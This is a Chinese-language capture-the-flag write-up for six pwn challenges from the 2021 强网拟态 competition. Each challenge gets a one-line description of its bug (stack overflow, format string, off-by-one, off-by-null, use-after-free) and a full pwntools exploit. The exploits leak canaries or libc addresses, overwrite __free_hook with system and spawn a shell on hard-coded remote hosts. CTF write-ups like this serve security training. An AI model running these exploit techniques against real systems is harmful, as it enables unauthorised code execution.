2021 强网拟态 Writeup

sonic

远程服务器上 /usr/bin/cli 是个 cat flag 程序，栈溢出劫持运行后面函数即可

EXP

from pwn import *

context.arch = 'amd64'

context.log_level='debug'
#r=process('./sonic')
r=remote('123.60.63.90','6889')

#gdb.attach(r,"b *$rebase(0x7B4)")
#raw_input()

r.recvuntil(" Address=")
addr=int(r.recv(15),16)
print(hex(addr))
base=addr-0x7cf
print(hex(base))

payload='a'*0x28+p64(base+0x73A)
r.sendline(payload)
r.interactive()

pwnpwn

预留后门的格式化字符串题目

EXP

from pwn import *
#context.log_level='debug'
#r=process('./pwnpwn')
r=remote('124.71.156.217','49153')
r.recv()
r.sendline('1')
r.recvuntil("let us give you some trick\n")
leak=int(r.recv(15),16)
base=leak-0x9b9
print(hex(leak))
r.sendline('2')
r.recv()
payload='%21$p'
r.sendline(payload)
r.recv(2)
canary=int(r.recv(0x12),16)
print(hex(canary))
payload='a'*(0x70-8)+p64(canary)+'a'*8+p64(base+0xb83)+p64(base+0x202010)+p64(base+0x951)
r.sendline(payload)
r.interactive()

old_school

off by one

测试的时候 malloc unsortedbin 会清空 fd bk 指针，所以先重叠对空间在泄露地址完成利用

EXP

from pwn import *
context.log_level = 'debug'

def add(idx,size):
	p.recv()
	p.sendline('1')
	p.recv()
	p.sendline(str(idx))
	p.recv()
	p.sendline(str(size))

def edit(idx,con):
	p.recv()
	p.sendline('2')
	p.recv()
	p.sendline(str(idx))
	p.recv()
	p.sendline(con)

def show(idx):
	p.recv()
	p.sendline('3')
	p.recv()
	p.sendline(str(idx))
def dele(idx):
	p.recv()
	p.sendline('4')
	p.recv()
	p.sendline(str(idx))

#p = process("./old_school")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=remote('121.36.194.21','49154')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

for i in range(10):
	add(i,0xf8)
for i in range(7,-1,-1):
	dele(i)
for i in range(7):
	add(i+1,0xf8)
edit(1,0xf0*'a'+p64(0x200)+'\x00')
for i in range(9,1,-1):
	dele(i)	
for i in range(7):
	add(i+3,0xf8)
add(0,0xf8)
show(1)

main_arean_96 = u64(p.recvuntil("\x7f")[-6::].ljust(8,'\x00'))
print "main_arean_96:",hex(main_arean_96)
libc_addr = main_arean_96-96-0x3ebc40
print "libc_addr:",hex(libc_addr)
free_hook = libc_addr + libc.sym['__free_hook']
system = libc_addr + libc.sym['system']

add(2,0xf8)
dele(2)
edit(1,p64(0)*2)
dele(2)
edit(1,p64(free_hook)*2)
add(10,0xf8)
add(11,0xf8)
edit(11,p64(system))
edit(1,"/bin/sh\x00\x00")

#gdb.attach(p)
#raw_input()

dele(1)

p.interactive()

old_school_revenge

Off by null ，直接套上一题脚本

EXP

from pwn import *
context.log_level = 'debug'

def add(idx,size):
	p.recv()
	p.sendline('1')
	p.recv()
	p.sendline(str(idx))
	p.recv()
	p.sendline(str(size))

def edit(idx,con):
	p.recv()
	p.sendline('2')
	p.recv()
	p.sendline(str(idx))
	p.recv()
	p.sendline(con)

def show(idx):
	p.recv()
	p.sendline('3')
	p.recv()
	p.sendline(str(idx))
def dele(idx):
	p.recv()
	p.sendline('4')
	p.recv()
	p.sendline(str(idx))

#p = process("./old_school_revenge")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=remote('121.36.194.21','49154')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

for i in range(10):
	add(i,0xf8)
for i in range(7,-1,-1):
	dele(i)
for i in range(7):
	add(i+1,0xf8)
edit(1,0xf0*'a'+p64(0x200))
for i in range(9,1,-1):
	dele(i)	
for i in range(7):
	add(i+3,0xf8)
add(0,0xf8)

show(1)

main_arean_96 = u64(p.recvuntil("\x7f")[-6::].ljust(8,'\x00'))
print "main_arean_96:",hex(main_arean_96)
libc_addr = main_arean_96-96-0x3ebc40
print "libc_addr:",hex(libc_addr)
free_hook = libc_addr + libc.sym['__free_hook']
system = libc_addr + libc.sym['system']

add(2,0xf8)
dele(2)
edit(1,p64(0)*2)
dele(2)
edit(1,p64(free_hook)*2)
add(10,0xf8)
add(11,0xf8)
edit(11,p64(system))
edit(1,"/bin/sh\x00\x00")

dele(1)


#gdb.attach(p)
#raw_input()
p.interactive()

random_heap

uaf ，但是 malloc 是随机数，需要爆破，尽量复用堆块提高概率

EXP

#!/usr/bin/python
#-*-coding:utf-8-*- 
from pwn import *
import sys
from ctypes import *
import time
import random

'''
patchelf --set-interpreter /glibc/2.27/amd64/lib/ld-2.27.so --set-rpath /glibc/2.27/amd64/lib random_heap
'''

#r=process('./pe')
#r=remote('124.71.140.198','49154')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#v0=(round(time.time()))
#random.seed(v0)
#def float_to_hex(f):
#    return int(struct.unpack('<I', struct.pack('<f', f))[0])
#def myrand(size):
#	new=int(size)
#	v=float_to_hex(random.random())
#	v2=int(0xf)
#	v1=(v & v2)
#	v3=v1*16
#	print(hex(v3))
#	if size==v3:
#		return 0
#	else:
#		return size-v3


def add(idx,size):
	r.recv()
	r.sendline('1')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(str(size))
def edit(idx,con):
	r.recv()
	r.sendline('2')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(con)
def show(idx):
	r.recv()
	r.sendline('3')
	r.recv()
	r.sendline(str(idx))
def dele(idx):
	r.recv()
	r.sendline('4')
	r.recv()
	r.sendline(str(idx))





def pwn():
	add(0,0xf8)
	add(1,0x100)
	edit(1,"/bin/sh\x00\x00")
	dele(0)
	edit(0,'a'*0x10)
	dele(0)
	show(0)
	r.recvuntil("Content: ",timeout=0.4)
	info = r.recvuntil("\n",timeout=0.4, drop=True)
	heap_addr = u64(info.ljust(8, b"\x00"))
	log.info("heap_addr: "+hex(heap_addr))
	for i in range(6):
		edit(0,'a'*0x10)
		dele(0)
	show(0)
	main_arean_96 = u64(((r.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
	log.info("main_arean_96: "+hex(main_arean_96))
	libc_base = (main_arean_96 - 96) - 0x3ebc40#0x3aec40
	print "libc_base:",hex(libc_base)

	free_hook = libc_base + libc.sym['__free_hook']
	system = libc_base + libc.sym['system']

	add(2,0x18)
	dele(2)
	edit(0,p64(free_hook)*2)
	dele(2)
	edit(0,p64(free_hook)*2)
	add(2,0x18)
	show(2)
	tmp = u64(((r.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
	if(tmp!=free_hook):
		exit()

	#gdb.attach(r,"b *$rebase(0xBCB)")
	#raw_input()

	add(3,0x18)
	edit(3,p64(system))
	dele(1)

	r.sendline("cat flag")
	print r.recvuntil("}",timeout=0.4)


#context.log_level='debug'


#r = process("./random_heap", env={"LD_PRELOAD":"./libc-2.27.so"})
#libc = ELF("libc-2.27.so")
#r = process("./random_heap")
#libc = ELF("/glibc/2.27/amd64/lib/libc.so.6")

#r = process("./uaf")
#libc = ELF("/glibc/2.27/amd64/lib/libc.so.6")
#r = process("./uaf", env={"LD_PRELOAD":"./libc-2.27.so"})
libc = ELF("libc-2.27.so")

#pwn()
#r.interactive()

times = 0
while 1:
	try:
		#r = process("./random_heap")
		r = remote("124.71.140.198",49155)
		pwn()
		r.interactive()
	except:
		times += 1
		print("="*8+str(times)+" times"+"="*8)
		r.close()

bitflip

off by one

EXP

from pwn import *
context.log_level = 'debug'

def add(idx,size):
	r.recv()
	r.sendline('1')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(str(size))
def edit(idx,con):
	r.recv()
	r.sendline('2')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.send(con)
def show(idx):
	r.recv()
	r.sendline('3')
	r.sendlineafter("Index: ",str(idx))
def dele(idx):
	r.recv()
	r.sendline('4')
	r.sendlineafter("Index: ",str(idx))



r = process("./bitflip")
r = remote("124.71.130.185",49155)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


for i in range(10):
	add(i,0x48)
for i in range(7,-1,-1):
	dele(i)
r.sendlineafter("choice: ",'0'*0x1000)
for i in range(7):
	add(i+1,0x48)
edit(1,'a'*0x40+p64(0xa0)+'\x50')
for i in range(9,1,-1):
	dele(i)
r.sendlineafter("choice: ",'0'*0x1000)
for i in range(7):
	add(i+2,0x48)
add(0,0x48)
add(9,0x48)
add(10,0x48)
show(1)
main_arean_96 = u64(r.recvuntil('\x7f')[-6::].ljust(8,'\x00'))
print "main_arean_96:",hex(main_arean_96)
libc_addr = main_arean_96-96-0x3ebc40
print "libc_addr:",hex(libc_addr)
free_hook = libc_addr + libc.sym['__free_hook']
system = libc_addr + libc.sym['system']

dele(3)
dele(9)
edit(1,p64(free_hook)*2+'\n')
add(3,0x48)
add(11,0x48)
edit(11,p64(system)+'\n')
edit(4,"/bin/sh\x00\n")

#gdb.attach(r)
#raw_input()

dele(4)

r.interactive()